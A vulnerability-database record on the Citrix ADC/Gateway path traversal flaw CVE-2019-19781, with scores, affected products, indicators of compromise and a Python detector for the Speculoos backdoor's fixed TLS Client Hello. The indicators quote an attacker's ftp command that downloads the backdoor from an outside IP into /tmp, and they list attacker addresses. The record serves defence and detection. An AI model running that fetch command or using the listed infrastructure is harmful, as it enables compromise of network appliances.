CVE-2019-19781
published 2019-12-27

CVE-2019-19781: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

Priority: P197 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 100.00% (100.0th percentile)

Affected (17 ranges)

Vendor   Product                                    Version range   Fixed in
citrix   application_delivery_controller_firmware
citrix   application_delivery_controller_firmware
citrix   application_delivery_controller_firmware
citrix   application_delivery_controller_firmware
citrix   application_delivery_controller_firmware
citrix   citrix_adm
citrix   citrix_hypervisor
citrix   citrix_virtual_apps_and_desktops
citrix   endpoint_management
citrix   gateway_firmware
citrix   netscaler_adc
citrix   netscaler_gateway
citrix   netscaler_gateway_firmware
citrix   netscaler_gateway_firmware
citrix   netscaler_gateway_firmware
citrix   netscaler_gateway_firmware
citrix   xenserver

Detection & IOCs (extracted from sources)

ip: 66.42.98.220
domain: alibaba.zzux.com
ip: 119.28.139.120
ip: 119.28.139.20
filename: bsd
path: /tmp/bsd
command: /usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@66.42.98[.]220/
bytes (TLS Client Hello):
16 03 01 00 B5 01 00 00 B1 03 01 00 00 00 00 00 00 00 00 00 00 6A CE 14 27 3F 24 92 AB 0A A3 F7 DB 21 1C D6 7F FD E3 A3 50 00 00 00 00 48 C0 0A C0 14 00 88 00 87 00 39 00 38 C0 0F C0 05 00 84 00 35 C0 07 C0 09 C0 11 C0 13 00 45 00 44 00 66 00 33 00 32 C0 0C C0 0E C0 02 C0 04 00 96 00 41 00 04 00 05 00 2F C0 08 C0 12 00 16 00 13 C0 0D C0 03 FE FF 00 0A 02 01 00 00 3F 00 00 00 13 00 11 00 00 0E 6C 6F 67 69 6E 2E 6C 69 76 65 2E 63 6F 6D FF 01 00 01 00 00 0A 00 08 00 06 00 17 00 18 00 19 00 0B 00 02 01 00 00 23 00 00 33 74 00 00 00 05 00 05 01 00 00 00 00
snort: 52620
  • Speculoos backdoor sends a hardcoded TLS Client Hello packet with SNI set to 'login.live.com' as a masquerade; detect anomalous TLS connections to non-Microsoft IPs using this SNI value
  • Monitor Citrix ADC/Gateway devices for outbound FTP connections, especially to unknown IPs, dropping ELF/FreeBSD binaries to /tmp — indicative of CVE-2019-19781 post-exploitation payload staging
  • Speculoos is an ELF executable compiled for FreeBSD (GCC 4.2.1); detection of unexpected FreeBSD ELF binaries on Citrix ADC appliances is a strong indicator of compromise
  • CVE-2019-19781 exploitation is detectable via HTTP path traversal patterns in requests to Citrix ADC/Gateway; monitor for directory traversal sequences in HTTP/S requests to these devices
  • CVE-2019-19781 was first disclosed on December 17, 2019 via security bulletin CTX267679 with mitigations only; permanent patches were not issued until January 24, 2020, leaving a significant exploitation window
  • Speculoos does not natively maintain persistence; a separate component or additional adversary step is required to maintain the foothold on compromised Citrix appliances
  • CVE-2019-19781 affects Citrix ADC, Gateway, and SD-WAN WANOP appliances; all three product lines should be assessed and patched
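
As an added example (not part of this record or its sources), the Python below parses the Speculoos Client Hello bytes listed in the IOC section, pulls out the SNI and the fixed cipher-suite list, and flags a flow when the SNI claims login.live.com but the destination address falls outside an allowlist of networks that legitimately serve that name; the allowlist here is a TEST-NET placeholder to be replaced with your own resolver or ASN data.

```python
import struct
from ipaddress import ip_address, ip_network

# Hex of the hardcoded Speculoos TLS Client Hello listed in this record's IOCs.
SPECULOOS_CLIENT_HELLO = bytes.fromhex(
    "16 03 01 00 B5 01 00 00 B1 03 01 00 00 00 00 00 00 00 00 00 00 6A CE 14 "
    "27 3F 24 92 AB 0A A3 F7 DB 21 1C D6 7F FD E3 A3 50 00 00 00 00 48 C0 0A "
    "C0 14 00 88 00 87 00 39 00 38 C0 0F C0 05 00 84 00 35 C0 07 C0 09 C0 11 "
    "C0 13 00 45 00 44 00 66 00 33 00 32 C0 0C C0 0E C0 02 C0 04 00 96 00 41 "
    "00 04 00 05 00 2F C0 08 C0 12 00 16 00 13 C0 0D C0 03 FE FF 00 0A 02 01 "
    "00 00 3F 00 00 00 13 00 11 00 00 0E 6C 6F 67 69 6E 2E 6C 69 76 65 2E 63 "
    "6F 6D FF 01 00 01 00 00 0A 00 08 00 06 00 17 00 18 00 19 00 0B 00 02 01 "
    "00 00 23 00 00 33 74 00 00 00 05 00 05 01 00 00 00 00"
)

def u16(b: bytes, off: int) -> int:
    return struct.unpack_from("!H", b, off)[0]

def parse_client_hello(rec: bytes) -> dict:
    """Return version, cipher suites and SNI from a TLS record carrying a ClientHello."""
    if rec[0] != 0x16 or len(rec) < 5 + u16(rec, 3):
        raise ValueError("not a complete TLS handshake record")
    hs = rec[5:5 + u16(rec, 3)]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 2 + 32                                   # client_version + random
    pos += 1 + body[pos]                           # session_id (length-prefixed)
    cs_len = u16(body, pos); pos += 2
    suites = [u16(body, i) for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                           # compression_methods
    sni = None
    if pos + 2 <= len(body):                       # extensions block is optional
        end = pos + 2 + u16(body, pos); pos += 2
        while pos + 4 <= end:
            etype, elen = u16(body, pos), u16(body, pos + 2); pos += 4
            if etype == 0:                         # server_name: list len(2), type(1), name len(2), name
                name_len = u16(body, pos + 3)
                sni = body[pos + 5:pos + 5 + name_len].decode("ascii")
            pos += elen
    return {"version": (body[0], body[1]), "cipher_suites": suites, "sni": sni}

# Placeholder allowlist (TEST-NET) standing in for the networks that really serve login.live.com.
LEGIT_NETS = [ip_network("203.0.113.0/24")]

def sni_mismatch(rec: bytes, dst_ip: str, legit_nets=LEGIT_NETS) -> bool:
    """True when the ClientHello claims login.live.com but the peer is outside legit_nets."""
    info = parse_client_hello(rec)
    return info["sni"] == "login.live.com" and not any(ip_address(dst_ip) in n for n in legit_nets)
```

Because the backdoor's hello is hardcoded, the 36-entry cipher-suite list returned by parse_client_hello can also be matched as a fixed fingerprint alongside the SNI check.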

CVSS provenance

Source      Version  Score  Severity  Vector
nvd         v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck            9.8    CRITICAL
cisa                 9.8    CRITICAL